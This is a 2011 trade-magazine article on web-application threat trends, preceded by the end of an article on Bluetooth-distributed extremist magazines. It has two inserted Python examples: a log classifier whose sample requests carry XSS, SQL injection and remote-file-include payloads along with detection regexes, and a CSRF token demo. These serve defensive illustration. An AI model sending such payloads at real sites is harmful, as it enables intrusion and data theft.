beyond zero: analysing threat trends


using conventional arguments, so the difficult question facing Western allies is how to subvert these Bluetooth narrowcasts. Unconfirmed reports suggest that Western soldiers have been deploying Bluetooth signal jammers that block the control channels in the 2400-2480MHz waveband. The reality, however, is that without mesh-like coverage in a given area, the effectiveness of this type of jamming is limited, especially given the fact that this approach blocks all types of Bluetooth broadcasts, and not just the FJA al-Qaeda transmissions.

In theory, because of the packet-driven nature of the Bluetooth piconets, it should be possible to narrowcast a version of a given FJA magazine that has malformed packets or headers. This would mean that, although the Bluetooth transmission would checksum and ACK/NAK as normal, when recipients try to view the magazine on their smartphones, the data would appear jumbled. In the longer term, given the firmware-updatable nature of modern smartphones, it should be possible to allocate MAC-like identification routines within Bluetooth packet headers – perhaps derived from the International Mobile Subscriber Identity (IMSI) of the smartphone’s SIM card and/or the International Mobile Equipment Identity (IMEI) of the smartphone itself.

With most GSM and 3G networks now allowing only local SIM cards that have been identity-verified to use their networks, even if al-Qaeda uses stolen or reprogrammed smartphones to seed the community with their jihadist narrowcasts, anyone receiving an e-magazine could trace the narrowcast back along its chain of transmission. At the very least, this would allow the intelligence agencies to cross-match the re-transmitters of the al-Qaeda Bluetooth transmissions with a list of known terrorists and, perhaps more importantly, identify probable supporters. In fact, since most cellcos now maintain active lists of the registration details of their pre-pay SIM cards, it is possible to cross-match the SIM cards of the re-transmitting smartphones and the time of the re-transmission with the triangulated location of the mobile at the time of the Bluetooth narrowcast. Through careful extrapolation of the available data, it then becomes possible to work out the probable location of the Class 1 Bluetooth al-Qaeda originator of a given e-magazine, and take action accordingly.

About the author

Steve Gold has been a business journalist and technology writer for 26 years. A qualified accountant and former auditor, he has specialised in IT security, business matters, the Internet and communications for most of that time. He is technical editor of Infosecurity and lectures regularly on criminal psychology and cybercrime.


FEATURE

July 2011 Network Security

Beyond zero: analysing threat trends

Will Gragido

In tracing the history of threats over the past decade, we saw a sharp rise in ‘classic’ threats between 2000 and 2005, which targeted systems that were widely distributed across networks – such as the Microsoft Windows operating system. More sophisticated threats emerged in 2005 and 2006, indicating another level of danger. And in 2008, with the advent of the Conficker worm, there appeared to be a resurgence of the ‘classic’ threat. In fact, Conficker was anything but ordinary or classic – it spread rapidly as variants were released into the mainstream.

Will Gragido, HP TippingPoint DVLabs

In today’s world of sophisticated and escalating cyber-attacks against vulnerable data, we have entered new and dangerous ground within the Internet threat landscape.


Following the introduction of the Conficker worm, a dramatic increase in web application vulnerabilities was seen, lasting well into 2010. Research released by HP TippingPoint’s Digital Vaccine Labs (DVLabs) in September 2010 indicated that attacks associated with web application vulnerabilities surpass all other categories in volume [1]. These attacks are expected to escalate and remain at the forefront of threat activity. Conversely, more conventional attacks, such as those targeting standard operating systems, will continue to decline.

Figure 1 is a graphical representation of vulnerability disclosure from 2000 through to 2010. It is important to note the impact of vulnerable web applications, particularly from 2006 through 2008, and the decline in vulnerability disclosure from 2008 through 2010. Despite the overall decline in disclosed vulnerabilities, the research confirms that the majority of activity and vulnerabilities were related to web-based applications.

Last year was a significant year for cyber-threats as they demonstrated greater sophistication. The report indicates that the proliferation of technology (and its availability in previously untouched markets), along with simple, rapid accessibility, has an unprecedented negative impact on the state of security globally. The research, data collection and findings produced four key points:

• The availability and consumption of enterprise computing technologies is growing, leading to the emergence of more sophisticated, next-generation threats.

• Web applications remain at the forefront of exploit activity.

• The sophistication and organisation of cyber-attacks is increasing.

• Legacy threats remain an unrelenting element of the modern Internet threat landscape and are experiencing a resurgence.

Next-generation threats

The research also reflected the impact of enterprise-grade computing technologies on the emergence of next-generation threats. Most significantly, threat capabilities were influenced directly by the availability and consumption of these technologies in modern enterprise environments.

Web 2.0 technologies such as Facebook, Twitter, Wordpress and iTunes are increasingly leveraged for business today. They help promote brand awareness and collaboration, and enable organisations to adapt to a changing global business marketplace. However, these technologies also play a large role in enabling cyber-threats to successfully exploit individuals and enterprises. As a result, enterprise security teams and risk officers are challenged to efficiently mitigate these risks without disrupting business operations.

The DVLabs research shows that many organisations do not want to expose their companies to greater risk merely on the basis of a business value justification. The research also noted a general lack of security diligence in the management and enablement of Web 2.0 applications of a questionable state. This trend is dangerous to any organisation, especially given the range and types of threats to enterprise environments.

Web applications at the forefront

Throughout the DVLabs research efforts, web applications remained a strong focus and at the forefront of exploit activity. Specifically, the research noted a rise in professionally crafted exploit kits with a money-back guarantee designed to capitalise on the weaknesses present in web applications and architectures.

Figure 1: Overall vulnerability disclosure, 2000-2010.

Figure 2: HTTP client-side attacks by month during sample period.

Figure 3: HTTP server-side attacks by month during sampling period.

Figure 2 provides insight into the number of client-side HTTP attacks during the first six months of 2010, most of which were malicious JavaScript and file format attacks. Figure 3 provides similar insight into the number of server-side HTTP attacks, primarily cross-site scripting, SQL injection and PHP RFI.
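Counts like those behind Figure 3 are normally produced by running indicator rules over web-server logs and tallying hits per category. The following added example (not code from the article or from DVLabs' tooling) shows a minimal form of that for the three server-side categories the article names: percent-decode each request target once, apply a short ordered rule list, and count per category. The log lines, the 203.0.113.0/24 addresses and the rule patterns are all constructed for this demo and are deliberately coarse.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined-log style) for this demo;
# the addresses are from the 203.0.113.0/24 documentation range, not real hosts.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2010:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 1043
203.0.113.7 - - [12/Mar/2010:10:01:09 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512
203.0.113.9 - - [12/Mar/2010:10:02:11 +0000] "GET /product?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0
203.0.113.9 - - [12/Mar/2010:10:02:30 +0000] "GET /product?id=2%20UNION%20SELECT%201,2 HTTP/1.1" 500 0
203.0.113.11 - - [12/Mar/2010:10:03:45 +0000] "GET /index.php?page=http://203.0.113.200/c.txt? HTTP/1.1" 200 88
203.0.113.12 - - [12/Mar/2010:10:04:01 +0000] "POST /login HTTP/1.1" 302 0
"""

# Pulls method and request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Ordered (category, pattern) pairs applied to the percent-decoded request target.
# First match wins. These are coarse indicators for the three categories the
# article names, meant to show how such counts are produced, not an IDS rule set.
RULES = [
    ("xss", re.compile(r"<\s*script|javascript:", re.I)),
    ("sqli", re.compile(r"['\"]\s*(or|and)\s*['\"]?\d|union\s+select|;\s*drop\s+table", re.I)),
    ("php_rfi", re.compile(r"[?&]\w+=(https?|ftp)://", re.I)),
]


def classify_request(target: str) -> str:
    """Return the category for one request target, or 'benign' if no rule matches.

    The target is percent-decoded once so that %3Cscript%3E and <script> are
    treated alike; double-encoded payloads would need a second pass (not done here).
    """
    decoded = unquote_plus(target)
    for category, pattern in RULES:
        if pattern.search(decoded):
            return category
    return "benign"


def summarise_log(log_text: str) -> Counter:
    """Count requests per category across a log, one request per line."""
    counts = Counter()
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match is None:
            continue  # malformed or truncated line; skipped rather than guessed at
        counts[classify_request(match.group("target"))] += 1
    return counts


if __name__ == "__main__":
    for category, n in sorted(summarise_log(SAMPLE_LOG).items()):
        print(f"{category:8s} {n}")
```

On the constructed log this yields two benign requests, one XSS, two SQL injection and one PHP RFI. The RFI rule in particular will also flag legitimate parameters that carry a URL (open-redirect or callback parameters), so in practice the categories in a report like Figure 3 depend heavily on how strict the rule set is and whether hits were confirmed.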


Research shows that attacks launched against web servers versus those against clients represent a 50:1 ratio. This suggests that the rate, frequency and non-structured approach of attacks against web servers are all escalating. Although many attacks fail, the force multiplier approach demonstrates their persistence in establishing a qualified compromise.

Research indicated that attackers were more concerned with creating a data exfiltration point or malicious code than seeking ‘shell’ or ‘root’. Low-volume sites were also targeted by attackers to introduce malicious code in a variety of forms. As a result, attackers had greater control over sites to which they could direct unsuspecting victims with the intent of further exploitation.

Increasing sophistication and organisation

One of the more alarming trends in the past six months is the growing sophistication of attacks as they evolve to be more organised, subversive and inconspicuous. This trend is by design rather than chance. Many attacks are so subtle that few victims recognise the intrusion until it is too late. Recent research suggests it is more common now for attackers to remain resident within a compromised enterprise environment for extended periods of time, harvesting information to develop new mechanisms for attack. Once the information needed is in hand, the attackers have the ability to develop and launch covert exploits that will have a more significant impact.

While preparing the report, researchers invested time in the identification, tracking and analysis of trends within the threat landscape. Equal time was spent on an advanced technical analysis of Adobe’s Portable Document Format (PDF). As previously noted, malicious file formats play a major role in many modern, client-based attacks. HP research indicated that Adobe’s overall patch speed versus other third-party applications is consistent, yet slow. The report also determined that Adobe Reader v9 performs better than older versions such as v7 and v8. In reviewing the data sets relevant to v9 separately from v7 and v8, the vulnerability patch life cycle was found to be equivalent to that of Microsoft’s patch cycle – approximately 15 days.

Protection against current and emerging threats

The DVLabs research shines a light on new areas of concern and emerging threat trends. DVLabs' team, in connection with the SANS Institute, has developed a best practice guide to aid enterprise organisations in mitigating current and emerging threats:

1. Know your software/application inventory. This provides a deeper perspective of what is currently active in your enterprise footprint and enables you to better plan for remediation of unauthorised applications.

2. Ensure your organisation is supported by a defined and mature configuration-management process. If not, you may be opening your company to unnecessary risk.

3. Understand the security requirements associated with moving to a cloud computing model. As DVLabs research suggests that moving to the cloud can introduce certain vulnerabilities, a thorough risk assessment should be performed to ensure safe cloud utilisation.

4. Make sure your web application developers remain current. This will enable you to reduce or eliminate the net effect of many threats. Don’t assume that the behaviour or anticipated behaviour of an application will align with a given language or design scheme. Encouraging adherence to a sound Software Delivery Life Cycle (SDLC) and other application security software standards of good practice, such as the RUGGED software security model, will yield positive results.

5. Educate your end users. Instances of Cross-Site Request Forgery (CSRF) are high and will continue to grow. A clear understanding of the proper way to log off privileged (authentication-driven) websites prior to engaging other websites can pay significant dividends. Enterprises that take the time to invest in security-awareness programmes reap long-term benefits.

6. Invest in efficient patch management. Systems kept up to date with the latest security patches are more likely to be resistant to attacks.

7. Remain vigilant in the ongoing maintenance, monitoring and analysis of your enterprise environment. This includes the systems, people and processes needed to safeguard your organisation.
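Point 5 asks end users to log off privileged sites before browsing elsewhere because a browser attaches the session cookie to any cross-site request, which is what makes CSRF work. The following added example (not code from the article or from DVLabs) puts the server-side half of that picture in Python: a "before" transfer handler that trusts the session cookie alone, beside a hardened handler using the synchronizer-token pattern (a per-session random token embedded in the form and checked on every state-changing request), plus a logout step that shows why the article's end-user advice helps even where the application is not fixed. The banking application, account names, balances and the in-memory session store are all constructed for the demo.

```python
import hmac
import re
import secrets

# In-memory state, constructed for this demo; a real application would use its
# framework's session backend and a database.
SESSIONS = {}  # session id -> {"user": ..., "csrf": ...}
BALANCES = {}  # account -> balance


def login(user: str) -> str:
    """Create a session and bind a fresh, unguessable CSRF token to it."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def logout(sid: str) -> None:
    """Destroy the session server-side, so a cookie replayed later is dead."""
    SESSIONS.pop(sid, None)


def transfer_form(sid: str) -> str:
    """The page the app serves to its logged-in user; the hidden field carries the token.

    Another origin cannot read this page's contents, which is what makes the token useful.
    """
    token = SESSIONS[sid]["csrf"]
    return ('<form method="post" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def extract_token(html: str) -> str:
    """What the browser does when the genuine form is submitted: sends the hidden value."""
    return re.search(r'name="csrf_token" value="([^"]+)"', html).group(1)


def _do_transfer(user: str, form: dict) -> str:
    """Business logic shared by both handlers (constructed for the demo)."""
    amount = int(form["amount"])
    if BALANCES.get(user, 0) < amount:
        return "400 insufficient funds"
    BALANCES[user] -= amount
    BALANCES[form["to"]] = BALANCES.get(form["to"], 0) + amount
    return "200 ok"


def transfer_unprotected(cookie_sid: str, form: dict) -> str:
    """'Before' handler: trusts the session cookie alone. The browser attaches that
    cookie to a cross-site POST too, so a page on another site can forge the request."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return "401 no session"
    return _do_transfer(session["user"], form)


def transfer_protected(cookie_sid: str, form: dict) -> str:
    """Hardened handler: the POST must also carry the token bound to this session."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return "401 no session"
    # Constant-time compare so the token cannot be recovered one byte at a time.
    if not hmac.compare_digest(form.get("csrf_token", ""), session["csrf"]):
        return "403 csrf token missing or invalid"
    return _do_transfer(session["user"], form)


def demo() -> dict:
    """Run the legitimate, forged and post-logout cases; returns each outcome."""
    BALANCES.clear()
    BALANCES.update({"alice": 100, "bob": 0, "mallory": 0})
    sid = login("alice")
    # A forged request: the other site knows the URL and field names but not
    # alice's token; the browser adds her session cookie on its own.
    forged = {"to": "mallory", "amount": "50"}
    # The genuine submission, built from the form alice actually loaded.
    legit = {"to": "bob", "amount": "10", "csrf_token": extract_token(transfer_form(sid))}
    results = {
        "forged_vs_unprotected": transfer_unprotected(sid, forged),
        "forged_vs_protected": transfer_protected(sid, forged),
        "legit_vs_protected": transfer_protected(sid, legit),
    }
    logout(sid)  # the end-user habit point 5 recommends
    results["forged_after_logout"] = transfer_unprotected(sid, forged)
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:24s} {outcome}")
```

The forged request succeeds only against the unprotected handler while the session is alive; the token check rejects it, the genuine submission passes, and once the user has logged out even the unfixed handler has nothing to act on. The token check belongs on every state-changing request (POST, PUT, DELETE), never on GETs that should not change state in the first place. Browsers introduced after this article was written also support the SameSite cookie attribute, which stops the cookie being sent on most cross-site requests and complements, rather than replaces, the server-side token.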

About the author

Will Gragido is the product line manager for HP DVLabs with oversight over various DV-related services and other DVLabs projects. He has expertise in operations, vulnerability and threat analysis, management, professional services and consultancy, pre-sales/architecture and business development within the information security industry. Prior to joining HP, he held various positions at McAfee, Internet Security Systems, International Network Services and the United States Marine Corps. Gragido is a long-standing member of (ISC)2, ISACA, and ISSA. He holds CISSP and CISA certifications, as well as accreditations in the National Security Agency’s Information Security Assessment Methodology (IAM) and Information Security Evaluation Methodology (IEM).

References

1. ‘2010 Top Cyber Security Risks Report’. HP TippingPoint DVLabs, September 2010. Accessed May 2011. <http://dvlabs.tippingpoint.com/toprisks2010>.